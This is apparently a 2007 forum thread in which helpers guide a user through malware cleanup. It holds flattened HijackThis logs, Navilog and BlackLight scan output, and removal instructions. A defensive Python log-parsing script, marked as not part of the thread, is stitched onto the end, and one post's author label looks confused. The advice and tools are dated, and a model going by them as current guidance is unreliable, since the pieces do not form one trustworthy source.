Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeO4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exeO4 - Global Startup: America Online Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exeO4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... 
- {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: 
{79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exeO23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exeO23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exeO23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. 
- C:\PROGRA~1\Grisoft\AVG7\avgemc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. 
- C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 14294 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 5, 2007 ID:6021

Please download Navilog1 by IL-MAFIOSO:
http://perso.orange.fr/il.mafioso/Navifix/Navilog1.zip

Extract its contents to the desktop.
Double click on navilog1.exe to install it on your computer.
When the installation is complete, the tool will start automatically.
If it doesn't start automatically, please double click on the Navilog1 shortcut on your desktop to run it.
Press E for English from the language Menu.
Type 1 in the next Menu to select Search and press Enter.
Wait for the Scan to finish (It may take a reasonable amount of time).
Press any key as requested.
A new document will be produced: fixnavi.txt.
Please copy/paste the contents of this report in your next reply.
The report is also saved in the root of the directory, "%SystemDrive%\fixnavi.txt" (usually C:\fixnavi.txt).
John Posted July 6, 2007 Author ID:6035

Here are the navilog scan results:

Search Navipromo version 2.0.5 began on Thu 07/05/2007 at 21:39:13.29

!!! Warning, this report may include legitimate files/programs !!!
!!! Post this report on the forum you are being helped !!!
!!! Don't continue with removal unless instructed by an authorized helper !!!

Fix running from C:\Program Files\navilog1
Updated on 01.07.2007 at 12h00 by IL-MAFIOSO
Done in normal mode

*** Searching for installed Software ***

*** Search folders in C:\WINDOWS ***
*** Search folders in C:\Program Files ***
*** Search folders in C:\Documents and Settings\All Users\Application Data ***
*** Search folders in C:\Documents and Settings\Dad\Application Data ***
*** Search with BlackLight Engine/F-secure ***
BlackLight Engine is a product of F-secure, for more info:
http://www.f-secure.com/blacklight/blacklight_help.html

F-SECURE BLACKLIGHT ROOTKIT ELIMINATOR
======================================
Copyright 2005-2006 F-Secure Corporation. All rights reserved.
This is a beta version. It will expire on 1st of October, 2007.
Version information: 2.2.1064.

[+] Started on 07/05/07 at 21:39:15.
[+] Initializing ...
[+] Starting scan, press Ctrl-C to abort.
[+] Scanning for hidden items ....................................................................................................................
[+] Scan complete.
[+] Summary: 0 hidden item(s) found, 0 scheduled for renaming.
[+] Exited on 07/05/07 at 21:53:44 (return code = 0).

*** Search files ***
C:\WINDOWS\pack.epk found !

*** Search registry keys ***
Search in [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs]
Search in [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage]
Search Magic Control Key

*** Complementary Search *** (Search specifics files)
1)Search known files:
2)Heuristic Search :
* ** *** **** ***** ****** ******* ********
3)Certificates Search :
Certificate Egroup found !

*** Search completed on Thu 07/05/2007 at 21:54:27.64 ***
John Posted July 7, 2007 Author ID:6068

Hey there,
You have got a load on that system that may very well force my own personal hotrod PC here to puke out. Even if malware is still in there, it's fighting a losing battle for memory access. You gotta get yourself down to a single Antivirus and Firewall. If Symantec is broke or expired, lose it. If CA Internet Security Suite is a trial, then keep it until trial is out and lose AVG for now. AOL Spyware, Windows Defender and whatever else aren't needed if you keep CA as it has PestPatrol included. You have items in startup that are also unneeded and can be accessed when they are needed through All Programs or Desktop Shortcuts. If you are unfamiliar with msconfig, then maybe rock or I can walk you through that part. After you have uninstalled all unneeded items, let's peek at a fresh HijackThis log.

Still waiting for therock to take a look at my Navilog results.

Dumped AOL Spyware, Windows Defender & AVG for now. CA Internet Suite- I only have CA Spyware installed.
As far as I know the only firewall I have is Windows firewall.Could use some help with msconfig Here is an updated HJT log:Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 10:55:02 PM, on 7/6/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\wanmpsvc.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Common Files\AOL\1154100068\ee\aolsoftware.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\iPod\bin\iPodService.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\Program Files\Messenger\msmsgs.exeC:\Program 
Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Digital Line Detect\DLG.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Norton AntiVirus\navapsvc.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankO1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! 
Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! 
Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - 
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} 
(PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exe (file missing)O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google 
Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 11909 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 10, 2007 ID:6192

Open HijackThis and click Scan. Then check mark the following entries:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')

Now close all open windows except HijackThis and click Fix Checked.

Then post a new HijackThis log here in a reply.
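Added example (not part of any post in this thread, and not code from HijackThis or Malwarebytes): the logs here are pasted with their line breaks lost, and a fix like the one above is easiest to verify by comparing the scan taken before it with the scan taken after it. This Python sketch re-splits a flattened log at the HijackThis entry codes, lists entries whose target is reported as (no file) or (file missing), groups O1 Hosts redirects by IP, and reports which entries disappeared between two scans. The function names are hypothetical and the two samples are shortened excerpts constructed from lines in the 7/6 and 7/10 logs.

```python
import re
from collections import defaultdict

# Every HijackThis finding starts with a section code (R0-R3, F0-F3, N1-N4, O1, O2, ...)
# followed by " - ". Splitting on that is a heuristic: it assumes no path or
# description in the log happens to contain the same pattern.
ENTRY_START = re.compile(r"(?=(?:R[0-3]|F[0-3]|N[1-4]|O\d{1,2}) - )")
TRAILER = re.compile(r"--\s*End of file.*$", re.S)
MISSING = re.compile(r"\((?:no file|file missing)\)\s*$")
HOSTS = re.compile(r"^Hosts:\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)$")


def split_entries(flat_log):
    """Return (code, body) pairs from a log whose newlines were stripped."""
    text = TRAILER.sub("", flat_log)
    pieces = ENTRY_START.split(text)[1:]  # piece 0 is the header / process list
    entries = []
    for piece in pieces:
        code, _, body = piece.partition(" - ")
        entries.append((code, body.strip()))
    return entries


def missing_targets(entries):
    """Entries that point at a file HijackThis could not find (orphaned leftovers)."""
    return [(code, body) for code, body in entries if MISSING.search(body)]


def hosts_by_ip(entries):
    """Group O1 hosts-file redirects by the IP address they point to."""
    redirects = defaultdict(list)
    for code, body in entries:
        match = HOSTS.match(body) if code == "O1" else None
        if match:
            redirects[match.group(1)].append(match.group(2))
    return dict(redirects)


def removed_between(old_entries, new_entries):
    """Entries present in the earlier scan and absent from the later one."""
    still_present = set(new_entries)
    return [entry for entry in old_entries if entry not in still_present]


# Constructed sample: shortened excerpt of the 7/6 scan, flattened as on this page.
SCAN_JUL6 = (
    r"Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exe"
    r"R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank"
    r"O1 - Hosts: 64.124.166.37 klite.com"
    r"O1 - Hosts: 64.124.166.37 www.klite.com"
    r"O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')"
    r"O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)"
    r"O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - "
    r"%windir%\Network Diagnostic\xpnetdiag.exe (file missing)"
    r"--End of file - 11909 bytes"
)

# Constructed sample: the same excerpt as it appears in the 7/10 scan.
SCAN_JUL10 = (
    r"Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exe"
    r"O1 - Hosts: 64.124.166.37 klite.com"
    r"O1 - Hosts: 64.124.166.37 www.klite.com"
    r"O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)"
    r"O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - "
    r"%windir%\Network Diagnostic\xpnetdiag.exe (file missing)"
)

if __name__ == "__main__":
    before = split_entries(SCAN_JUL6)
    after = split_entries(SCAN_JUL10)
    print("Removed by the fix:")
    for code, body in removed_between(before, after):
        print(f"  {code} - {body}")
    print("Still pointing at missing files:")
    for code, body in missing_targets(after):
        print(f"  {code} - {body}")
    print("Hosts redirects still present:", hosts_by_ip(after))
```

On the excerpts, the diff shows the R0 and RunNarrator entries gone after the fix, while the hosts-file redirects and the orphaned O9 entries remain for a reviewer to look at.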
